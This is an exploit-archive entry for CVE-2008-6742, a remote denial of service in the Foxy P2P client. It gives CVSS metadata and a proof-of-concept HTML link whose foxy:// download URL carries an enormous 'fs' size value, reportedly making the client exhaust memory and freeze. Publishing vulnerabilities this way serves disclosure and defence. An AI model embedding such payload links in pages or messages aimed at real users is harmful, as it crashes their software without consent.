P2P Foxy Out of Memory Denial of Service Exploit

2009.04.25

Credit: Styxosaurus

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2008-6742

CWE: CWE-20

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: None

Availability impact: Partial

P2P Foxy Out of memory Exploit

# Vulnerability Discovered by Styxosaurus
# Styxosaurus [at] gmail [dot] com
#
# Foxy is one of the most popular P2P software in Chinese users
# http://tw.gofoxy.net/
#
# It starts to request more memory and freeze 
# as when "&fs=" meet some large magic point.


<a href='foxy://download? xt=urn:sha1:FPLNO5OUPWLSRWYZ4J4ZNAIJLEPSIND4
&dn=music.wmv&fs=1000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000
0000000000000000000000000'>Music.wmv</a>

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

P2P Foxy Out of Memory Denial of Service Exploit

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.